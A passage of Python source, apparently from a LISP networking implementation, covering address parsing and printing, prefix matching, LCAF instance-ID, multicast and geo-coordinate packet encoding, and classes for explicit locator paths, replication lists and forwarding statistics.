return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
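#
# Illustrative only: store_address() accepts the textual forms parsed
# above, with an optional "[<iid>]" prefix carrying the instance-id:
#
#   a = lisp_address(LISP_AFI_NONE, "", 0, 0)
#   a.store_address("[1000]10.1.1.1")     # IPv4, instance-id 1000
#
# and likewise, each on a fresh LISP_AFI_NONE instance:
#
#   "[2]fe80::1"          IPv6
#   "0011-2233-4455"      MAC
#   "+14085551212"        E.164
#   "'webserver'"         distinguished-name
#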
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
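#
# For example: an IPv4 entry 10.1.1.1/8 is masked down to 10.0.0.0/8.
# With mask_len 8 the mask is (2**8 - 1) << 24 = 0xff000000.
#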
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#endif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
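#
# A geo string has 8 or 9 dash-separated fields (the optional 9th is the
# altitude), with an optional "/<radius>" suffix making it a geo-prefix
# rather than a geo-point. Hypothetical examples:
#
#   "37-24-30-N-122-5-15-W"           geo-point
#   "37-24-30-N-122-5-15-W-50/20"     altitude 50, radius 20
#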
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
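#
# For example (hypothetical prefixes): with the same instance-id,
# [1000]10.1.0.0/16 is more specific than [1000]10.0.0.0/8, and a prefix
# is more specific than itself (equal is included). With a different
# instance-id, [2000]10.1.0.0/16 does not match [1000]10.0.0.0/8.
#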
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# it the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == None or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
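#
# Worked example (hypothetical): 37-24-30-N is stored as latitude -37,
# lat_mins 24, lat_secs 30, and converts to:
#
#   37 + (24*60 + 30)/3600.0 = 37.4083 degrees
#
# North latitudes and East longitudes come out positive, matching the
# usual signed decimal-degrees convention.
#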
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = blue(rle_node.rloc_name, html) if \
rle_node.rloc_name != None else ""
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
else "-" + str(port), rle_node.level,
"" if rle_node.rloc_name == None else rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string):
self.json_name = name
self.json_string = string
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
